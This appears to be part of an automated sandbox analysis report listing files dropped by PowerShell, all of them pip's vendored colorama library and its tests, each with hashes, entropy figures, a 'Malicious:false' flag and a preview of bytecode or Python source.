                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):181
                                                                                                                                                                                                                              Entropy (8bit):4.66967266841929
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:oxBl2lVO8l4jOFK5VcK85kdVWrzLUhKBV5yRWh6BRwIaQHtgem/l:YlCVneyw52KNdAreaVhc6Iaatgem/l
                                                                                                                                                                                                                              MD5:278177F6909F218AD1AB27A36DB67D82
                                                                                                                                                                                                                              SHA1:DA821EF613A1364DCF1FC8C8BE48A04A0C364E16
                                                                                                                                                                                                                              SHA-256:88BF6A69844FFD7F535C1C6973C331C6B3ED2A3ADD307169824A1B16B8DC25EE
                                                                                                                                                                                                                              SHA-512:020F929A8F5D050B3882AEBF211DA095A52CB294783E88E5C43B17AFF52F37AADFDC3CA1781E74B01E2E9F8EAA7CDF5348CBF2B4C49C9368FC85B493A680A92C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfK...............................y.).N..r..........TC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/colorama/tests/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5450
                                                                                                                                                                                                                              Entropy (8bit):4.271531723489091
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:+qKFEg/cB+IseXK7ue5WR5t6p94MeXKcTw6Cp94whwqniWW7RbW:pm/cB+IdK6eYphKcM60hwqnxEFW
                                                                                                                                                                                                                              MD5:120C6DDD9B8142348C412C1F4B2C241C
                                                                                                                                                                                                                              SHA1:D93B839FD04F6A29BD547DE845ED9ECFDBA0AFA0
                                                                                                                                                                                                                              SHA-256:C54F7312E75EE69309F693F15C92B3A8D06B1D932599AB0CE0B713AAE5E6C6C0
                                                                                                                                                                                                                              SHA-512:E79153DF0B71017075FE3BFFBE61082D7EEC9453D7E5630C91DCF08128282261805B5B3A28D24FF019880371262C7D5679C85192A80606E93EED0F10718C6E26
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...e.j...................Z.e.j...................Z...G.d...d.e.........Z.e.d.k(..r...e...........y.y.)......N)...TestCase..main.....)...Back..Fore..Style)...AnsiToWin32c.....................*.....e.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...AnsiTestc..........................|.j...................t.........t.........j...........................t...................|.j...................t.........t.........j...........................t...................y...N)...assertNotEqual..type..sys..stdoutr......stderr....selfs.... .UC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/colorama/tests/ansi_test.py..setUpz.AnsiTest.setUp....s6.................D........,.k..:..........D........,.k..:.....c.....................@.....t.........t........._.........t.........t........._.........y.r....)...stdout_origr....r......stderr_origr....r....s.... r......tearDownz.AnsiTest.tearDown....s........ ...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18086
                                                                                                                                                                                                                              Entropy (8bit):5.044762722015212
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:nhBS1kACqoMk/mx0YGFlLjVi4zbP1DnVusGzT:nhBS1H2NOxBslrzbP1Dn9A
                                                                                                                                                                                                                              MD5:AB9CA5C6CB544A96AE02993867437BC2
                                                                                                                                                                                                                              SHA1:7A49A88F2FA2DE1CA7F03750492F2F5597A71FDE
                                                                                                                                                                                                                              SHA-256:4813C9708AC0CB51F76D7DF904DD4B12C9D6A980EDFAAC72131D58BB286D1668
                                                                                                                                                                                                                              SHA-512:79091A94D9B253EB7AF3906D879EEAA63AD0AFA1CA6811A44F85888D96511C72F103A5FE8B7D4CD1D945A6618CDF458B3D6FA333278ED832B12A306CC9482657
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.)..............................d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.....d.d.l.m.Z.....d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z...G.d...d.e.........Z.e.d.k(..r...e...........y.y.#.e.$.r...d.d.l.m.Z...Y..Pw.x.Y.w.#.e.$.r...d.d.l.m.Z.m.Z.m.Z...Y..Zw.x.Y.w.)......)...StringIO..TextIOWrapper)...TestCase..main)...ExitStack)...MagicMock..Mock..patch.....)...AnsiToWin32..StreamWrapper..."ENABLE_VIRTUAL_TERMINAL_PROCESSING.....)...osnamec.....................0.....e.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...StreamWrapperTestc.....................~.....t.................}.t.........|.d.........}.|.j...................|.j...................|.j...................u...........y...N).r....r......assertTrue..random_attr)...self..mockStream..wrappers.... .\C:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/colorama/tests/ansitowin32_test.py..testIsAProxyz.StreamWrapperTest.testIsAProxy....s2.........V........D..1.............,..,...0F.0F..F.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11731
                                                                                                                                                                                                                              Entropy (8bit):4.755466053696089
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:fztkiinO+Cq3JI4bhb8b+hwb6wmNsJ/9Y9zjZ+jqdQT1:fztkXODq3OM49Y9HwjqdQx
                                                                                                                                                                                                                              MD5:154752EE661501F7E81A0CE6B92FCCA9
                                                                                                                                                                                                                              SHA1:DA74939D1A3ED904343C5E2EEAEDC3BA85C6BDCC
                                                                                                                                                                                                                              SHA-256:1863A3234EED4CFA0A853882791A7B02A03D49A2572AC9BA7B7A8264597801A5
                                                                                                                                                                                                                              SHA-512:D07C0BC2BF3248D7A272AAE42C42D90F973259EEE7FA89B93E0794D5557BB8E84AC6E091F06572AB3579345283E86F4B239EA448C6B3CC06A24DB779BE6DCDB2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfU...............................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.....d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...e.j&..................Z.e.j*..................Z...G.d...d.e.........Z...G.d...d.e.........Z.e.d.k(..r...e...........y.y.#.e.$.r...d.d.l.m.Z.m.Z...Y..cw.x.Y.w.)......N)...TestCase..main..skipUnless)...patch..Mock.....)...StreamWrapper)...init..just_fix_windows_console.._wipe_internal_state_for_tests.....)...osname..replace_byc.....................z.....e.Z.d.Z...e.e.j...................j...........................d.........d...........Z.d...Z.d...Z.d...Z...e.d...........e.d.d.............e.d.d...........d...........................Z...e.d...........e.d.d...........d...................Z.d...Z.d...Z.d...Z.d...Z.d...Z...e.d...........e.d.........d...................Z...e.d.........d...........Z...e.d.........d...........Z.y.)...InitTestz.sys.stdout is not a ttyc.....................$.....|.j.............................y...N)...assertNotWrapped....selfs.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4887
                                                                                                                                                                                                                              Entropy (8bit):4.609853093980296
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:OEYJz6O7B86alHdoiNoCxNuY8Xqhrk4K0rvoZUe2PI8V:FYpRVBCjdN3lq0rvo7D8
                                                                                                                                                                                                                              MD5:654E79BCD6AE64CCF6206FB787EAC674
                                                                                                                                                                                                                              SHA1:A932661B4F257B31FBE9CE7A9DB970A100BA5F7F
                                                                                                                                                                                                                              SHA-256:01E7A9FB6687B516822678ADFA3B955667D2E0A52BE62F578BAD656307B3F230
                                                                                                                                                                                                                              SHA-512:DB63A8BA8E6253E84271480234B78865FC77B4680AD83DB43B0674D8BF33DBA556912C4F8EC2E2FC511A0B6C061D213AAB33FF1559B22D174BB2062995E18B9A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.VfJ.........................~.....d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d...Z...G.d...d.e.........Z.e.d.k(..r...e...........y.y.)......N)...TestCase..main.....)...StreamWrapper..AnsiToWin32.....)...pycharm..replace_by..replace_original_by..StreamTTY..StreamNonTTYc.....................6.....t.........|.d.........j...........................S...N).r......isatty)...streams.... .WC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/colorama/tests/isatty_test.py..is_a_ttyr........s...............&..-..-../../.....c.....................6.....e.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...IsattyTestc..........................t.................}.|.j...................t.........|...................t.................5...|.j...................t.........|...................d.d.d...........y.#.1.s.w...Y.....y.x.Y.w.r....).r......assertTruer....r........self..ttys.... r......test_TTYz.IsattyTest.test_TTY....sC.........k.................&....Y..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2471
                                                                                                                                                                                                                              Entropy (8bit):4.679805462610139
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:leF4NQi8v0SFD0mgscQRWyakwEg7QUPMcxCe94wUa:UFBi8LDpm5jxCha
                                                                                                                                                                                                                              MD5:A8099C38B6D8E6815B22902C05555186
                                                                                                                                                                                                                              SHA1:32B613C954F4DD976DF8FB9FCF3E008D25C424E9
                                                                                                                                                                                                                              SHA-256:A971774387E78E335525BB2ECB1A1E601A428D4E7DDD045EAB8D9702443350E1
                                                                                                                                                                                                                              SHA-512:D928178A5A3A6916D0EE483D61D7358EEE90FDCE3558A520A63A1EB641185AE66F2D5595F38ED7D9F420AD0995FBFB9D5E472074F2288EC58E1ECDDD6E6D98C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf7..............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z...G.d...d.e.........Z...G.d...d.e.........Z.e.d...........Z.e.d...........Z.e.d...........Z.e.d...........Z.y.)......)...contextmanager)...StringIONc...........................e.Z.d.Z.d...Z.y.)...StreamTTYc...........................y.).NT......selfs.... .QC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_vendor/colorama/tests/utils.py..isattyz.StreamTTY.isatty....s..............N....__name__..__module__..__qualname__r....r....r....r....r....r........s...........r....r....c...........................e.Z.d.Z.d...Z.y.)...StreamNonTTYc...........................y.).NFr....r....s.... r....r....z.StreamNonTTY.isatty....s.........r....Nr....r....r....r....r....r........s...........r....r....c................#....`...K.....t.........j...................}.|.t........._.........d.......|.t........._.........y...w...N)...os..name).r......origs.... r......osnamer........s ............7.7.D....B.G.......B.G.s....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6595
                                                                                                                                                                                                                              Entropy (8bit):4.45311691967976
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:RLY0GtZZ+u5FnAv+FrEFPaRUknHe2DpMY:dCtZACF3FIFPa6sHe2DpMY
                                                                                                                                                                                                                              MD5:E7C18D1EB5FCF9F4E123B974E3C984BF
                                                                                                                                                                                                                              SHA1:A9CFA0764D9118CE563310E9566591606949BF6C
                                                                                                                                                                                                                              SHA-256:4AF58280D86DACD4874AAFE4FCDC0F5E9C7AAFB203382ED1B240BED3639858DC
                                                                                                                                                                                                                              SHA-512:245C30170B44363461518B63E717F6A89D15409E73A35153E8713DB2AC0E2D43678D8C45AE706418D730518555E622F18DFF48D00D58E5C5736D3C842AE791D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf}..............................d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.....d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.....G.d...d.e.........Z.e.d.k(..r...e...........y.y.#.e.$.r...d.d.l.m.Z.m.Z...Y..2w.x.Y.w.)......N)...TestCase..main..skipUnless)...Mock..patch.....)...WinColor..WinStyle..WinTermc..........................e.Z.d.Z...e.d.........d...........Z...e.e.j...................j...................d.........d.........d...........Z...e.d.........d...........Z...e.e.j...................j...................d.........d.........d...........Z...e.e.j...................j...................d.........d.........d...........Z...e.e.j...................j...................d.........d.........d...........Z...e.d.........d...........Z...e.d.........d...........Z.y.)...WinTermTestz.colorama.winterm.win32c...........................t.................}.d.|._.........|.|.j..................._.........t.................}.|.j...................|.j...................d...........|.j...................|.j.......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2839
                                                                                                                                                                                                                              Entropy (8bit):5.117527352407065
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:UtKJPdI10zfPyCCRP2PeRSk2cCC5dEmhOYy5HmeBirpp1CIhVolFQHj6ePa1:UtKQCCRP2PeRSTcCC5dEmhOYy5HmeBiQ
                                                                                                                                                                                                                              MD5:5986A9683E8505BB1A6BB312767143E3
                                                                                                                                                                                                                              SHA1:5B77E569947032D68C619AE683452E181B763124
                                                                                                                                                                                                                              SHA-256:15E5620EB50834865CAF9D393C0C6F5380235F3D5AB048802ECF465CC87045A1
                                                                                                                                                                                                                              SHA-512:57D808ED2626D399441F56BC274C40118E47EF8224691CDF2D1E8A3A0F27E88DB4590E8A4B74AB655ECA68F2851F0A8F0A59F3FEB8653BDEA377D0E566B91555
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..import sys.from unittest import TestCase, main..from ..ansi import Back, Fore, Style.from ..ansitowin32 import AnsiToWin32..stdout_orig = sys.stdout.stderr_orig = sys.stderr...class AnsiTest(TestCase):.. def setUp(self):. # sanity check: stdout should be a file or StringIO object.. # It will only be AnsiToWin32 if init() has previously wrapped it. self.assertNotEqual(type(sys.stdout), AnsiToWin32). self.assertNotEqual(type(sys.stderr), AnsiToWin32).. def tearDown(self):. sys.stdout = stdout_orig. sys.stderr = stderr_orig... def testForeAttributes(self):. self.assertEqual(Fore.BLACK, '\033[30m'). self.assertEqual(Fore.RED, '\033[31m'). self.assertEqual(Fore.GREEN, '\033[32m'). self.assertEqual(Fore.YELLOW, '\033[33m'). self.assertEqual(Fore.BLUE, '\033[34m'). self.assertEqual(Fore.MAGENTA, '\033[35m'). self.assertE
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10678
                                                                                                                                                                                                                              Entropy (8bit):4.633541851885193
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Ut3S+QLDq6wMxRgD3mr7RME+3RwUEGoMZ9yw3d/bxWvaKM:UVSfn3236jVMZ9l/KaKM
                                                                                                                                                                                                                              MD5:FFD5754E37673CEAC9F2C816E1D354A6
                                                                                                                                                                                                                              SHA1:F12536366DF3F26B15685884CE4A071C8EC70BAB
                                                                                                                                                                                                                              SHA-256:44DEC0221309E44A83B186828D5A3EA38BBC2730C3E2E9096E67AF58A4BBD2B6
                                                                                                                                                                                                                              SHA-512:79F7ACB56685FACFB0A78EFC931389BD77ED9C13E95BA82B801E1670011D1D7AF3CFDD91359CECC2E6B0FC28AF4AEE26CF8517021786D29FC0F009A4AAB7AE39
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..from io import StringIO, TextIOWrapper.from unittest import TestCase, main.try:. from contextlib import ExitStack.except ImportError:. # python 2. from contextlib2 import ExitStack..try:. from unittest.mock import MagicMock, Mock, patch.except ImportError:. from mock import MagicMock, Mock, patch..from ..ansitowin32 import AnsiToWin32, StreamWrapper.from ..win32 import ENABLE_VIRTUAL_TERMINAL_PROCESSING.from .utils import osname...class StreamWrapperTest(TestCase):.. def testIsAProxy(self):. mockStream = Mock(). wrapper = StreamWrapper(mockStream, None). self.assertTrue( wrapper.random_attr is mockStream.random_attr ).. def testDelegatesWrite(self):. mockStream = Mock(). mockConverter = Mock(). wrapper = StreamWrapper(mockStream, mockConverter). wrapper.write('hello'). self.assertTrue(mockConverter.write.call_args, (('hello',), {}))..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6741
                                                                                                                                                                                                                              Entropy (8bit):4.40487783875554
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:UtKbNB2c2OFIou31P/Nrg80cfhRLuZmHeM:UIbNB2c2AdulP/tg80cf3L3+M
                                                                                                                                                                                                                              MD5:711F7C7A03992D3C9B8523960E2CBFFB
                                                                                                                                                                                                                              SHA1:16AFA8A34506B925F9B9EB34540972D23288E6CA
                                                                                                                                                                                                                              SHA-256:05B3F2F977F21F027ACCAA33B903AF36F419CECC7DBDD6FFD1B6179FB86C0537
                                                                                                                                                                                                                              SHA-512:3DCE3A070A82ED1A0F8F64A030545743AB90735A0CDA9D7D1C905EC3197D58BF895DC04797507E6F63C0732A7C0BB7971DE6CE29B189B661AB7F1F2A4C766D4F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..import sys.from unittest import TestCase, main, skipUnless..try:. from unittest.mock import patch, Mock.except ImportError:. from mock import patch, Mock..from ..ansitowin32 import StreamWrapper.from ..initialise import init, just_fix_windows_console, _wipe_internal_state_for_tests.from .utils import osname, replace_by..orig_stdout = sys.stdout.orig_stderr = sys.stderr...class InitTest(TestCase):.. @skipUnless(sys.stdout.isatty(), "sys.stdout is not a tty"). def setUp(self):. # sanity check. self.assertNotWrapped().. def tearDown(self):. _wipe_internal_state_for_tests(). sys.stdout = orig_stdout. sys.stderr = orig_stderr.. def assertWrapped(self):. self.assertIsNot(sys.stdout, orig_stdout, 'stdout should be wrapped'). self.assertIsNot(sys.stderr, orig_stderr, 'stderr should be wrapped'). self.assertTrue(isinstance(sys.stdout, StreamWrapper
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1866
                                                                                                                                                                                                                              Entropy (8bit):4.544362770054849
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:QjtcTtJ/epQMG0o1Q6sxg3gcqW+nA/uwKmqot+KyLd6DL6gL57WpaUC:UtKJ/eEvcM/ca1
                                                                                                                                                                                                                              MD5:7634E0302B0F5F962627B1922B07A3B9
                                                                                                                                                                                                                              SHA1:F3D9E6E2455A250D9F03F0850238C6311D6DF6A1
                                                                                                                                                                                                                              SHA-256:3E0DBA2D1A6FD3240307901CFACC605571BB86C035358BDAA45800A597D8CD98
                                                                                                                                                                                                                              SHA-512:5FA7B630CC1C2CA9B7F74724BE8A9E4A641FF2139B43AF696D732D76B573FDAEF8BF5988874278DF9907120DC398D7AC3B44C7B7007B95E22D5C3E1D3A600D03
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..import sys.from unittest import TestCase, main..from ..ansitowin32 import StreamWrapper, AnsiToWin32.from .utils import pycharm, replace_by, replace_original_by, StreamTTY, StreamNonTTY...def is_a_tty(stream):. return StreamWrapper(stream, None).isatty()..class IsattyTest(TestCase):.. def test_TTY(self):. tty = StreamTTY(). self.assertTrue(is_a_tty(tty)). with pycharm():. self.assertTrue(is_a_tty(tty)).. def test_nonTTY(self):. non_tty = StreamNonTTY(). self.assertFalse(is_a_tty(non_tty)). with pycharm():. self.assertFalse(is_a_tty(non_tty)).. def test_withPycharm(self):. with pycharm():. self.assertTrue(is_a_tty(sys.stderr)). self.assertTrue(is_a_tty(sys.stdout)).. def test_withPycharmTTYOverride(self):. tty = StreamTTY(). with pycharm(), replace_by(tty):. self.assertTrue(is_a_tty
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1079
                                                                                                                                                                                                                              Entropy (8bit):4.704399921121776
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:QjtcTGakh7Hn0v9Zu3vNw6koc6uqE6DzVhoQtO:UtNakxHnaufVm6tEIM
                                                                                                                                                                                                                              MD5:31142629E641450AC51D1D4556112C7C
                                                                                                                                                                                                                              SHA1:783C1793406EDEC31D678F9B859D1E789085BF2C
                                                                                                                                                                                                                              SHA-256:D48211CA51B7F73E7E773AB4F51FE782E7F1C8F67182574D6EBC4AC541B018A1
                                                                                                                                                                                                                              SHA-512:7F6798910E5D0726F2D15268DC4FE942DB9035B3E66A75353EB5F4042504EC528E475CA5285B4009EAAA6238CC0ECF0056C48D3377FAB7E89E8D06A71D250EB0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..from contextlib import contextmanager.from io import StringIO.import sys.import os...class StreamTTY(StringIO):. def isatty(self):. return True..class StreamNonTTY(StringIO):. def isatty(self):. return False..@contextmanager.def osname(name):. orig = os.name. os.name = name. yield. os.name = orig..@contextmanager.def replace_by(stream):. orig_stdout = sys.stdout. orig_stderr = sys.stderr. sys.stdout = stream. sys.stderr = stream. yield. sys.stdout = orig_stdout. sys.stderr = orig_stderr..@contextmanager.def replace_original_by(stream):. orig_stdout = sys.__stdout__. orig_stderr = sys.__stderr__. sys.__stdout__ = stream. sys.__stderr__ = stream. yield. sys.__stdout__ = orig_stdout. sys.__stderr__ = orig_stderr..@contextmanager.def pycharm():. os.environ["PYCHARM_HOSTED"] = "1". non_tty = StreamNonTTY(). with replace_by(non_tty), re
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3709
                                                                                                                                                                                                                              Entropy (8bit):4.673765280159559
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:UtKJS+f8FyR/qpovTRx1yRhqp5oXiyRdqpcX5MCyRdqpcXha1:UtK8RuL5o2cpcRM
                                                                                                                                                                                                                              MD5:3322CABD2108DA984BD053BF61B8C1CC
                                                                                                                                                                                                                              SHA1:93F6F19AA15E24BE89645E77DC9B0DF9F6A6AF4E
                                                                                                                                                                                                                              SHA-256:AA85853C48F29B9826D91B8CC297F7A4E8ACDDAE6BFCF259142CCADB9E092FC0
                                                                                                                                                                                                                              SHA-512:A8A94A1C6256319DE42103E500A95B9B0483B1C581C90441142B02CAC7CF2ADCFF24F4B349AAF0066DBE2212630E02E7AF413A823AE5BC11956F5CCC946E7BDD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..import sys.from unittest import TestCase, main, skipUnless..try:. from unittest.mock import Mock, patch.except ImportError:. from mock import Mock, patch..from ..winterm import WinColor, WinStyle, WinTerm...class WinTermTest(TestCase):.. @patch('colorama.winterm.win32'). def testInit(self, mockWin32):. mockAttr = Mock(). mockAttr.wAttributes = 7 + 6 * 16 + 8. mockWin32.GetConsoleScreenBufferInfo.return_value = mockAttr. term = WinTerm(). self.assertEqual(term._fore, 7). self.assertEqual(term._back, 6). self.assertEqual(term._style, 8).. @skipUnless(sys.platform.startswith("win"), "requires Windows"). def testGetAttrs(self):. term = WinTerm().. term._fore = 0. term._back = 0. term._style = 0. self.assertEqual(term.get_attrs(), 0).. term._fore = WinColor.YELLOW. self.assertEqual(term.get_attrs(), Win
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6181
                                                                                                                                                                                                                              Entropy (8bit):4.827417170994829
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:UtaqHA607vSEzL3a0XgCuBdzTuz6BzP46BU4cj5uTYeK3JLAHArhNDLJLAHGVrx3:UwcAV2VO4X8eoZAHArhNDLZAHGVr2fa
                                                                                                                                                                                                                              MD5:0AF1249CC740B035C9018A878510EE8E
                                                                                                                                                                                                                              SHA1:E62A37BD5263EEB89370C89611DAD0EC8490838D
                                                                                                                                                                                                                              SHA-256:61038AC0C4F0B4605BB18E1D2F91D84EFC1378FF70210ADAE4CBCF35D769C59B
                                                                                                                                                                                                                              SHA-512:9872DA9BD612E2325FECB131D08B61D4F851B4F882568CFE74B637F83C1757520117CBFFD64BDFC90BB01CA9CF02EEB0404008B1B785E7094738CFE92A3E5C32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file...# from winbase.h.STDOUT = -11.STDERR = -12..ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x0004..try:. import ctypes. from ctypes import LibraryLoader. windll = LibraryLoader(ctypes.WinDLL). from ctypes import wintypes.except (AttributeError, ImportError):. windll = None. SetConsoleTextAttribute = lambda *_: None. winapi_test = lambda *_: None.else:. from ctypes import byref, Structure, c_char, POINTER.. COORD = wintypes._COORD.. class CONSOLE_SCREEN_BUFFER_INFO(Structure):. """struct in wincon.h.""". _fields_ = [. ("dwSize", COORD),. ("dwCursorPosition", COORD),. ("wAttributes", wintypes.WORD),. ("srWindow", wintypes.SMALL_RECT),. ("dwMaximumWindowSize", COORD),. ]. def __str__(self):. return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % (. self.dwSize.Y, self.dwSize.X. , s
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7134
                                                                                                                                                                                                                              Entropy (8bit):4.628426663677934
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:UtX14HaGq4sGmJ+w0RwWD7FfTLg3j4C1b8bvPBQbhvTOUg3tKrZ0KfJkp3tKKf8b:UR1eD8wVTQrZVcWj
                                                                                                                                                                                                                              MD5:A52A65AEEDFBF43C54D6302F0D2809CB
                                                                                                                                                                                                                              SHA1:A48DA4F9CCF921288676F44626CF6BF313EF3A40
                                                                                                                                                                                                                              SHA-256:5C24050C78CF8BA00760D759C32D2D034D87F89878F09A7E1EF0A378B78BA775
                                                                                                                                                                                                                              SHA-512:944095573BEDE4A1527345CE07A86161A02ED28BC626C52F504ADA8E6775FCCCD389E81639C3F5B2C74B2BE473480ACF9E74B73132D09AB8BB3E198ED0963C92
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..try:. from msvcrt import get_osfhandle.except ImportError:. def get_osfhandle(_):. raise OSError("This isn't windows!")...from . import win32..# from wincon.h.class WinColor(object):. BLACK = 0. BLUE = 1. GREEN = 2. CYAN = 3. RED = 4. MAGENTA = 5. YELLOW = 6. GREY = 7..# from wincon.h.class WinStyle(object):. NORMAL = 0x00 # dim text, dim background. BRIGHT = 0x08 # bright text, dim background. BRIGHT_BACKGROUND = 0x80 # dim text, bright background..class WinTerm(object):.. def __init__(self):. self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes. self.set_attrs(self._default). self._default_fore = self._fore. self._default_back = self._back. self._default_style = self._style. # In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style.. #
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):625
                                                                                                                                                                                                                              Entropy (8bit):4.839153435181085
                                                                                                                                                                                                                              Encrypted:false
